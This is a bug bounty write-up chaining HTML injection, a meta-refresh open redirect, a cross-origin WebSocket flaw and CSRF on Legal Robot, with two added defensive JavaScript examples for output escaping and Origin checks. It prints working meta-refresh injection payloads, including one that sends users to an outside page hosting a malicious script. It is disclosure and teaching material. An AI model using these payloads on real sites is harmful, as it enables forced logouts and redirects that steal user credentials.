Chain the vulnerabilities and take your report impact to the moon (CSRF to HTML INJECTION, resulting in OPEN REDIRECT that could steal USER CREDENTIALS)


It was the weekend and time for some research, so I started reading public disclosures on https://hackerone.com/hacktivity.
After reading some good blogs I decided to put them into practice, so I quickly selected my target.

I had noticed that Legal Robot responds quickly and resolves vulnerabilities fast, so I selected Legal Robot as my target and started looking into its assets and scope.

After understanding the scope I started looking into the application, and I noticed that it was not sanitizing special characters in some parameters. So I started injecting HTML tags, and they were rendered.


So yes, I had found HTML injection. BUG #1.

Next I tried for XSS there, to see whether I could get script to execute.

The payload was injected, but I found that the web application uses CSP, so the alert did not pop up. :( Sad part.


But if you are a hacker you never get satisfied until you exploit it.

So I kept digging and tried my second payload, which was:

"/><META HTTP-EQUIV="refresh" CONTENT="1;url=https://app.legalrobot.com/sign-out">

With this payload, whenever a user visits the roadmap page they are automatically logged out of their account.

I found this interesting, so next I tried redirecting to my own website and executing a malicious script. I used this payload:

"/><META HTTP-EQUIV="refresh" CONTENT="1;url=http://www.mysite.com/malicious_script.html">

This resulted in an open redirect. BUG #2

It also executed my malicious script.
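The HTML injection and the meta-refresh redirect above come down to one defect: user input is concatenated into the page without output encoding, and the CSP that blocked the alert does nothing about a meta refresh because no script runs. As an added example (not code from this write-up or from Legal Robot), the Node.js snippet below places the write-up's payload into an input attribute once raw and once through an HTML-escaping function, and counts how many tags each fragment contains. The redirect target in the sample payload is a placeholder, and the names escapeHtml, renderRoadmapField, renderRoadmapFieldUnsafe and countTagOpeners are chosen for this example.

```javascript
// Added example (not code from the write-up or from Legal Robot): output encoding is
// what stops this HTML injection; a script-src CSP does not, because a meta refresh
// executes no script. Function names are chosen for this example.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Escape the five characters that can change HTML structure in element or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Fixed template: the user-controlled value is escaped before it is placed in the
// attribute, so it can only ever be attribute text.
function renderRoadmapField(userValue) {
  return `<input name="roadmap" value="${escapeHtml(userValue)}">`;
}

// Unfixed template, reproducing the defect the write-up describes: the raw value is
// concatenated into the attribute and can close it and open new elements.
function renderRoadmapFieldUnsafe(userValue) {
  return `<input name="roadmap" value="${userValue}">`;
}

// Counts tag openers in a fragment. The fixed template always yields exactly one (its own
// <input>); any other count means the user value broke out of the attribute.
function countTagOpeners(html) {
  return (html.match(/<[a-zA-Z!\/]/g) || []).length;
}

// The write-up's meta-refresh payload as constructed sample input. The redirect target is
// a placeholder under the reserved .example TLD, not a real site.
const META_REFRESH_PAYLOAD =
  '"/><META HTTP-EQUIV="refresh" CONTENT="1;url=https://attacker.example/page.html">';

const unsafeFragment = renderRoadmapFieldUnsafe(META_REFRESH_PAYLOAD);
const safeFragment = renderRoadmapField(META_REFRESH_PAYLOAD);

console.log("unsafe:", unsafeFragment, "| tag openers:", countTagOpeners(unsafeFragment)); // 2
console.log("safe:  ", safeFragment, "| tag openers:", countTagOpeners(safeFragment));     // 1
```

In the escaped fragment the META element survives only as the text `&lt;META ...&gt;` inside the attribute, so the browser never sees a refresh directive; the same encoding also removes the sign-out and third-party-redirect variants, since they differ only in the url value. Encoding has to happen at the point of output, in the template, rather than by stripping characters on input.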


So I was able to perform malicious actions through it.

I quickly made a PoC, reported it, and got a quick reply from the team, which was this:


The bug was triaged, but the team member mentioned that the attacker would have to do a little social engineering. I thought, yeah, but I was not satisfied when I read "SOCIAL ENGINEERING". The team member had, however, given me a hint by mentioning "UNKNOWN EXPLOIT", and that was enough of a hint for me.

I started digging into the application again, and while doing so I noticed that the web application uses WebSockets.

So I started checking the headers of every page and found that the Origin header handling was misconfigured. BUG #3

So I tried connecting to the application's WebSocket from a third-party origin, and the connection succeeded.


It was allowing WebSocket connections from a different origin, which should not work.

I think the mobile app does not send an Origin header. (I am still not sure about this.)
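The server-side check that closes this gap is an exact-match validation of the handshake's Origin header, which is the one defence against cross-origin WebSocket connections because the browser attaches the session cookie regardless of who opened the socket. As an added example (not Legal Robot's code), the Node.js function below normalises the Origin value with the URL parser, compares it exactly against an allowlist (the allowed origin https://app.legalrobot.com is assumed for this example), rejects the literal "null" and malformed values, and treats a missing Origin, the non-browser case raised just above, as a separate opt-in decision. The names isAllowedOrigin and gateHandshake and the sample handshake headers are constructed for this example; a library hook such as the ws package's verifyClient would call something like gateHandshake.

```javascript
// Added example (not Legal Robot's code): exact-match Origin validation for a WebSocket
// handshake. Names, allowlist value and sample handshakes are constructed for this example.

// Origins permitted to open a socket. Assumed value: the web app itself.
const ALLOWED_ORIGINS = new Set(["https://app.legalrobot.com"]);

// Normalise the Origin header to scheme://host[:port] with the URL parser and compare it
// exactly against the allowlist. No substring or prefix matching, so a host that merely
// contains the allowed name is rejected, as are "null" and malformed values.
function isAllowedOrigin(originHeader, { allowMissingOrigin = false } = {}) {
  if (originHeader === undefined || originHeader === null || originHeader === "") {
    // Browsers always send Origin on a WebSocket handshake, so a missing header means a
    // non-browser client (for instance a mobile app). Accept that only when the deployment
    // opts in, and then authenticate such clients with a token rather than the session cookie.
    return allowMissingOrigin;
  }
  let parsed;
  try {
    parsed = new URL(originHeader); // throws on "null" and on anything that is not a URL
  } catch (err) {
    return false;
  }
  return ALLOWED_ORIGINS.has(parsed.origin); // default ports are dropped by the parser
}

// Handshake gate in the shape a verifyClient-style hook would use: given the request
// headers (lower-cased names, as Node's http module provides them), decide whether to
// complete the upgrade or answer 403.
function gateHandshake(headers, options) {
  const origin = headers["origin"];
  if (!isAllowedOrigin(origin, options)) {
    const shown = origin === undefined ? "(none)" : origin;
    return { accept: false, status: 403, reason: `Origin ${shown} not allowed` };
  }
  return { accept: true, status: 101 };
}

// Constructed sample handshakes (headers only; the session cookie is a placeholder).
const SAME_ORIGIN = {
  host: "app.legalrobot.com",
  upgrade: "websocket",
  cookie: "session=PLACEHOLDER",
  origin: "https://app.legalrobot.com",
};
const CROSS_ORIGIN = { ...SAME_ORIGIN, origin: "https://third-party.example" };          // the case the write-up found accepted
const LOOKALIKE_ORIGIN = { ...SAME_ORIGIN, origin: "https://app.legalrobot.com.example" }; // a substring check would accept this
const NULL_ORIGIN = { ...SAME_ORIGIN, origin: "null" };                                   // sandboxed frames send this
const NO_ORIGIN = { ...SAME_ORIGIN };
delete NO_ORIGIN.origin;                                                                  // non-browser client

const SAMPLES = { SAME_ORIGIN, CROSS_ORIGIN, LOOKALIKE_ORIGIN, NULL_ORIGIN, NO_ORIGIN };
for (const [label, headers] of Object.entries(SAMPLES)) {
  console.log(label, gateHandshake(headers));
}
```

Only SAME_ORIGIN completes the upgrade; the cross-origin, look-alike and "null" handshakes get 403, and the header-less one is rejected unless the caller passes `{ allowMissingOrigin: true }`. Logging the rejected origins is also a cheap detection signal for attempts at this kind of cross-site WebSocket connection.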

So I was able to perform a CSRF attack (BUG #4) using this, and I chained the HTML injection (which resulted in the open redirect) with the CSRF attack.

Again I quickly made a PoC of this and reported it.


This time I got a quick reply and the bug was patched in a single day. (SO QUICK)


I got good feedback along with a sweet bounty amount.


Thanks HackerOne Legal Robot.

Thanks for reading, guys. Comments are most welcome.
Have a great day ahead.
